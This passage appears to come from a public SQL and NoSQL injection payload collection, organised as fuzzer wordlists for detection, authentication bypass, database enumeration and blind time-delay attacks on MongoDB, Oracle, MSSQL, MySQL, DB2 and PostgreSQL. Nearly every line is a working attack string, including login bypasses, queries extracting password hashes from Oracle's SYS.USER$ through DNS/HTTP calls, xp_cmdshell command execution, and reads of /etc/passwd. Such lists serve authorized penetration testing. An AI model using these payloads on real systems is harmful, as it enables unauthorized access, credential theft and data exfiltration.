4 | ', $where: '1 == 1'
5 | 1, $where: '1 == 1'
6 | { $ne: 1 }
7 | ', $or: [ {}, { 'a':'a
8 | ' } ], $comment:'successful MongoDB injection'
9 | db.injection.insert({success:1});
10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
11 | || 1==1
12 | ' && this.password.match(/.*/)//+%00
13 | ' && this.passwordzz.match(/.*/)//+%00
14 | '%20%26%26%20this.password.match(/.*/)//+%00
15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00
16 | {$gt: ''}
17 | [$ne]=1
18 | ';sleep(5000);
19 | ';sleep(5000);'
20 | ';sleep(5000);+'
21 | ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
--------------------------------------------------------------------------------
/Intruder/detect/Oracle/oracle.txt:
--------------------------------------------------------------------------------
1 | ’ or ‘1’=’1
2 | ' or '1'='1
3 | '||utl_http.request('httP://192.168.1.1/')||'
4 | ' || myappadmin.adduser('admin', 'newpass') || '
5 | ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
6 | ' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
7 | ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
8 | ' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
9 | ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
10 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
11 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
12 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
13 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
14 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
15 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
16 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
17 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
18 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
19 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
20 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
21 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
22 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
23 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
24 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
25 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
26 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
27 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
28 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
29 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
30 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
31 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
32 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
33 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
34 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
35 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
36 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
37 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
38 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
39 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
40 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
41 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
42 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
43 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
44 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
45 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
46 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
47 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
48 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
49 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
50 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
51 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
52 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
53 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
54 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
55 |
56 |
--------------------------------------------------------------------------------
/Intruder/detect/xPlatform/xplatform.txt:
--------------------------------------------------------------------------------
1 | <>"'%;)(&+
2 | |
3 | !
4 | ?
5 | /
6 | //
7 | //*
8 | '
9 | ' --
10 | (
11 | )
12 | *|
13 | */*
14 | &
15 | 0
16 | 031003000270000
17 | 0 or 1=1
18 | 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
19 | 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
20 | 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
21 | 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
22 | 1 or 1=1
23 | 1;SELECT%20*
24 | 1 waitfor delay '0:0:10'--
25 | '%20or%20''='
26 | '%20or%201=1
27 | ')%20or%20('x'='x
28 | '%20or%20'x'='x
29 | %20or%20x=x
30 | %20'sleep%2050'
31 | %20$(sleep%2050)
32 | %21
33 | 23 OR 1=1
34 | %26
35 | %27%20or%201=1
36 | %28
37 | %29
38 | %2A%28%7C%28mail%3D%2A%29%29
39 | %2A%28%7C%28objectclass%3D%2A%29%29
40 | %2A%7C
41 | ||6
42 | '||'6
43 | (||6)
44 | %7C
45 | a'
46 | admin' or '
47 | ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
48 | ' and 1 in (select var from temp)--
49 | anything' OR 'x'='x
50 | "a"" or 1=1--"
51 | a' or 1=1--
52 | "a"" or 3=3--"
53 | a' or 3=3--
54 | a' or 'a' = 'a
55 | '%20OR
56 | as
57 | asc
58 | a' waitfor delay '0:0:10'--
59 | '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
60 | bfilename
61 | char%4039%41%2b%40SELECT
62 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
63 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
64 | declare @q nvarchar (4000) select @q =
65 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
66 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
67 | declare @s varchar(22) select @s =
68 | declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
69 | delete
70 | desc
71 | distinct
72 | '||(elt(-3+5,bin(15),ord(10),hex(char(45))))
73 | '; exec master..xp_cmdshell
74 | '; exec master..xp_cmdshell 'ping 172.10.1.255'--
75 | exec(@s)
76 | '; exec ('sel' + 'ect us' + 'er')
77 | exec sp
78 | '; execute immediate 'sel' || 'ect us' || 'er'
79 | exec xp
80 | '; exec xp_regread
81 | ' group by userid having 1=1--
82 | handler
83 | having
84 | ' having 1=1--
85 | hi or 1=1 --"
86 | hi' or 1=1 --
87 | "hi"") or (""a""=""a"
88 | hi or a=a
89 | hi' or 'a'='a
90 | hi') or ('a'='a
91 | 'hi' or 'x'='x';
92 | insert
93 | like
94 | limit
95 | *(|(mail=*))
96 | *(|(objectclass=*))
97 | or
98 | ' or ''='
99 | or 0=0 #"
100 | ' or 0=0 --
101 | ' or 0=0 #
102 | " or 0=0 --
103 | or 0=0 --
104 | or 0=0 #
105 | ' or 1 --'
106 | ' or 1/*
107 | ; or '1'='1'
108 | ' or '1'='1
109 | ' or '1'='1'--
110 | ' or 1=1
111 | ' or 1=1 /*
112 | ' or 1=1--
113 | ' or 1=1--
114 | '/**/or/**/1/**/=/**/1
115 | ‘ or 1=1 --
116 | " or 1=1--
117 | or 1=1
118 | or 1=1--
119 | or 1=1 or ""=
120 | ' or 1=1 or ''='
121 | ' or 1 in (select @@version)--
122 | or%201=1
123 | or%201=1 --
124 | ' or 2 > 1
125 | ' or 2 between 1 and 3
126 | ' or 3=3
127 | ‘ or 3=3 --
128 | ' or '7659'='7659
129 | or a=a
130 | or a = a
131 | ' or 'a'='a
132 | ' or a=a--
133 | ') or ('a'='a
134 | " or "a"="a
135 | ) or (a=a
136 | order by
137 | ' or (EXISTS)
138 | or isNULL(1/0) /*
139 | " or isNULL(1/0) /*
140 | ' or 'something' like 'some%'
141 | ' or 'something' = 'some'+'thing'
142 | ' or 'text' = n'text'
143 | ' or 'text' > 't'
144 | ' or uid like '%
145 | ' or uname like '%
146 | ' or 'unusual' = 'unusual'
147 | ' or userid like '%
148 | ' or user like '%
149 | ' or username like '%
150 | ' or username like char(37);
151 | ' or 'whatever' in ('whatever')
152 | ' -- &password=
153 | password:*/=1--
154 | PRINT
155 | PRINT @@variable
156 | procedure
157 | replace
158 | select
159 | ' select * from information_schema.tables--
160 | ' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
161 | ' (select top 1
162 | --sp_password
163 | 'sqlattempt1
164 | (sqlattempt2)
165 | 'sqlvuln
166 | '+sqlvuln
167 | (sqlvuln)
168 | sqlvuln;
169 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
170 | to_timestamp_tz
171 | truncate
172 | tz_offset
173 | ' UNION ALL SELECT
174 | ' union all select @@version--
175 | ' union select
176 | uni/**/on sel/**/ect
177 | ' UNION SELECT
178 | ' union select 1,load_file('/etc/passwd'),1,1,1;
179 | ) union select * from information_schema.tables;
180 | ' union select * from users where login = char(114,111,111,116);
181 | update
182 | '||UTL_HTTP.REQUEST
183 | ,@variable
184 | @variable
185 | @var select @var as var into temp end --
186 | \x27UNION SELECT
187 | x' AND 1=(SELECT COUNT(*) FROM tabname); --
188 | x' AND email IS NULL; --
189 | x' AND members.email IS NULL; --
190 | x' AND userid IS NULL; --
191 | x' or 1=1 or 'x'='y
192 | x' OR full_name LIKE '%Bob%
193 | ý or 1=1 --
194 |
--------------------------------------------------------------------------------
/Intruder/exploit/Auth_Bypass.txt:
--------------------------------------------------------------------------------
1 | '-'
2 | ' '
3 | '&'
4 | '^'
5 | '*'
6 | ' or ''-'
7 | ' or '' '
8 | ' or ''&'
9 | ' or ''^'
10 | ' or ''*'
11 | "-"
12 | " "
13 | "&"
14 | "^"
15 | "*"
16 | " or ""-"
17 | " or "" "
18 | " or ""&"
19 | " or ""^"
20 | " or ""*"
21 | or true--
22 | " or true--
23 | ' or true--
24 | ") or true--
25 | ') or true--
26 | ' or 'x'='x
27 | ') or ('x')=('x
28 | ')) or (('x'))=(('x
29 | " or "x"="x
30 | ") or ("x")=("x
31 | ")) or (("x"))=(("x
32 | or 1=1
33 | or 1=1--
34 | or 1=1#
35 | or 1=1/*
36 | admin' --
37 | admin' #
38 | admin'/*
39 | admin' or '1'='1
40 | admin' or '1'='1'--
41 | admin' or '1'='1'#
42 | admin' or '1'='1'/*
43 | admin'or 1=1 or ''='
44 | admin' or 1=1
45 | admin' or 1=1--
46 | admin' or 1=1#
47 | admin' or 1=1/*
48 | admin') or ('1'='1
49 | admin') or ('1'='1'--
50 | admin') or ('1'='1'#
51 | admin') or ('1'='1'/*
52 | admin') or '1'='1
53 | admin') or '1'='1'--
54 | admin') or '1'='1'#
55 | admin') or '1'='1'/*
56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
57 | admin" --
58 | admin" #
59 | admin"/*
60 | admin" or "1"="1
61 | admin" or "1"="1"--
62 | admin" or "1"="1"#
63 | admin" or "1"="1"/*
64 | admin"or 1=1 or ""="
65 | admin" or 1=1
66 | admin" or 1=1--
67 | admin" or 1=1#
68 | admin" or 1=1/*
69 | admin") or ("1"="1
70 | admin") or ("1"="1"--
71 | admin") or ("1"="1"#
72 | admin") or ("1"="1"/*
73 | admin") or "1"="1
74 | admin") or "1"="1"--
75 | admin") or "1"="1"#
76 | admin") or "1"="1"/*
77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
78 | ==
79 | =
80 | '
81 | ' --
82 | ' #
83 | ' –
84 | '--
85 | '/*
86 | '#
87 | " --
88 | " #
89 | "/*
90 | ' and 1='1
91 | ' and a='a
92 | or 1=1
93 | or true
94 | ' or ''='
95 | " or ""="
96 | 1′) and '1′='1–
97 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
98 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
99 | and 1=1
100 | and 1=1–
101 | ' and 'one'='one
102 | ' and 'one'='one–
103 | ' group by password having 1=1--
104 | ' group by userid having 1=1--
105 | ' group by username having 1=1--
106 | like '%'
107 | or 0=0 --
108 | or 0=0 #
109 | or 0=0 –
110 | ' or 0=0 #
111 | ' or 0=0 --
112 | ' or 0=0 #
113 | ' or 0=0 –
114 | " or 0=0 --
115 | " or 0=0 #
116 | " or 0=0 –
117 | %' or '0'='0
118 | or 1=1
119 | or 1=1--
120 | or 1=1/*
121 | or 1=1#
122 | or 1=1–
123 | ' or 1=1--
124 | ' or '1'='1
125 | ' or '1'='1'--
126 | ' or '1'='1'/*
127 | ' or '1'='1'#
128 | ' or '1′='1
129 | ' or 1=1
130 | ' or 1=1 --
131 | ' or 1=1 –
132 | ' or 1=1--
133 | ' or 1=1;#
134 | ' or 1=1/*
135 | ' or 1=1#
136 | ' or 1=1–
137 | ') or '1'='1
138 | ') or '1'='1--
139 | ') or '1'='1'--
140 | ') or '1'='1'/*
141 | ') or '1'='1'#
142 | ') or ('1'='1
143 | ') or ('1'='1--
144 | ') or ('1'='1'--
145 | ') or ('1'='1'/*
146 | ') or ('1'='1'#
147 | 'or'1=1
148 | 'or'1=1′
149 | " or "1"="1
150 | " or "1"="1"--
151 | " or "1"="1"/*
152 | " or "1"="1"#
153 | " or 1=1
154 | " or 1=1 --
155 | " or 1=1 –
156 | " or 1=1--
157 | " or 1=1/*
158 | " or 1=1#
159 | " or 1=1–
160 | ") or "1"="1
161 | ") or "1"="1"--
162 | ") or "1"="1"/*
163 | ") or "1"="1"#
164 | ") or ("1"="1
165 | ") or ("1"="1"--
166 | ") or ("1"="1"/*
167 | ") or ("1"="1"#
168 | ) or '1′='1–
169 | ) or ('1′='1–
170 | ' or 1=1 LIMIT 1;#
171 | 'or 1=1 or ''='
172 | "or 1=1 or ""="
173 | ' or 'a'='a
174 | ' or a=a--
175 | ' or a=a–
176 | ') or ('a'='a
177 | " or "a"="a
178 | ") or ("a"="a
179 | ') or ('a'='a and hi") or ("a"="a
180 | ' or 'one'='one
181 | ' or 'one'='one–
182 | ' or uid like '%
183 | ' or uname like '%
184 | ' or userid like '%
185 | ' or user like '%
186 | ' or username like '%
187 | ' or 'x'='x
188 | ') or ('x'='x
189 | " or "x"="x
190 | ' OR 'x'='x'#;
191 | '=' 'or' and '=' 'or'
192 | ' UNION ALL SELECT 1, @@version;#
193 | ' UNION ALL SELECT system_user(),user();#
194 | ' UNION select table_schema,table_name FROM information_Schema.tables;#
195 | admin' and substring(password/text(),1,1)='7
196 | ' and substring(password/text(),1,1)='7
197 | ' or 1=1 limit 1 -- -+
198 | '="or'
--------------------------------------------------------------------------------
/Intruder/exploit/DB2/db2-enumeration.txt:
--------------------------------------------------------------------------------
1 | select versionnumber, version_timestamp from sysibm.sysversions;
2 | select user from sysibm.sysdummy1;
3 | select session_user from sysibm.sysdummy1;
4 | select system_user from sysibm.sysdummy1;
5 | select current server from sysibm.sysdummy1;
6 | select name from sysibm.systables;
7 | select grantee from syscat.dbauth;
8 | select * from syscat.tabauth;
9 | select * from syscat.dbauth where grantee = current user;
10 | select * from syscat.tabauth where grantee = current user;
11 | select name, tbname, coltype from sysibm.syscolumns;
12 | SELECT schemaname FROM syscat.schemata;
13 |
--------------------------------------------------------------------------------
/Intruder/exploit/MSSQL/ms-sql-enumeration.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/payloadbox/sql-injection-payload-list/6e55457963a04377b904a93a6a65bb49dfe7bccb/Intruder/exploit/MSSQL/ms-sql-enumeration.txt
--------------------------------------------------------------------------------
/Intruder/exploit/MySQL/mysql-injection-login-bypass.txt:
--------------------------------------------------------------------------------
1 | <username>' OR 1=1--
2 | 'OR '' = ' Allows authentication without a valid username.
3 | <username>'--
4 | ' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
5 | 'OR 1=1--
6 |
--------------------------------------------------------------------------------
/Intruder/exploit/MySQL/mysql-read-local-files.txt:
--------------------------------------------------------------------------------
1 | create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
2 |
--------------------------------------------------------------------------------
/Intruder/exploit/PostgresSQL/postgres-enumeration.txt:
--------------------------------------------------------------------------------
1 | select version();
2 | select current_database();
3 | select current_user;
4 | select session_user;
5 | select current_setting('log_connections');
6 | select current_setting('log_statement');
7 | select current_setting('port');
8 | select current_setting('password_encryption');
9 | select current_setting('krb_server_keyfile');
10 | select current_setting('virtual_host');
11 | select current_setting('port');
12 | select current_setting('config_file');
13 | select current_setting('hba_file');
14 | select current_setting('data_directory');
15 | select * from pg_shadow;
16 | select * from pg_group;
17 | create table myfile (input TEXT);
18 | copy myfile from '/etc/passwd';
19 | select * from myfile;copy myfile to /tmp/test;
20 |
--------------------------------------------------------------------------------
/Intruder/payloads-sql-blind/MSSQL/payloads-sql-blind-MSSQL-INSERT.txt:
--------------------------------------------------------------------------------
1 | )%20waitfor%20delay%20'0:0:20'%20/*
2 | )%20waitfor%20delay%20'0:0:20'%20--
3 | ')%20waitfor%20delay%20'0:0:20'%20/*
4 | ')%20waitfor%20delay%20'0:0:20'%20--
5 | ")%20waitfor%20delay%20'0:0:20'%20/*
6 | ")%20waitfor%20delay%20'0:0:20'%20--
7 | ))%20waitfor%20delay%20'0:0:20'%20/*
8 | ))%20waitfor%20delay%20'0:0:20'%20--
9 | '))%20waitfor%20delay%20'0:0:20'%20/*
10 | '))%20waitfor%20delay%20'0:0:20'%20--
11 | "))%20waitfor%20delay%20'0:0:20'%20/*
12 | "))%20waitfor%20delay%20'0:0:20'%20--
13 | ,NULL)%20waitfor%20delay%20'0:0:20'%20/*
14 | ,NULL)%20waitfor%20delay%20'0:0:20'%20--
15 | ',NULL)%20waifor%20delay%20'0:0:20'%20/*
16 | ',NULL)%20waitfor%20delay%20'0:0:20'%20--
17 | ",NULL)%20waitfor%20delay%20'0:0:20'%20/*
18 | ",NULL)%20waitfor%20delay%20'0:0:20'%20--
19 | ),NULL)%20waitfor%20delay%20'0:0:20'%20/*
20 | ),NULL)%20waitfor%20delay%20'0:0:20'%20--
21 | '),NULL)%20waifor%20delay%20'0:0:20'%20/*
22 | '),NULL)%20waitfor%20delay%20'0:0:20'%20--
23 | "),NULL)%20waitfor%20delay%20'0:0:20'%20/*
24 | "),NULL)%20waitfor%20delay%20'0:0:20'%20--
25 | ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
26 | ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
27 | ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
28 | ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
29 | ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
30 | ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
31 | ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
32 | ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
33 | '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
34 | '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
35 | "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
36 | "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
37 | ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
38 | ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
39 | ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
40 | ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
41 | ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
42 | ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
43 | ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
44 | ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
45 | '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
46 | '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
47 | "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
48 | "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
49 | ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
50 | ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
51 | ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
52 | ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
53 | ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
54 | ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
55 | ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
56 | ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
57 | '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
58 | '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
59 | "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
60 | "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
61 | ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
62 | ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
63 | ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
64 | ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
65 | ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
66 | ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
67 | ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
68 | ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
69 | '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
70 | '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
71 | "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
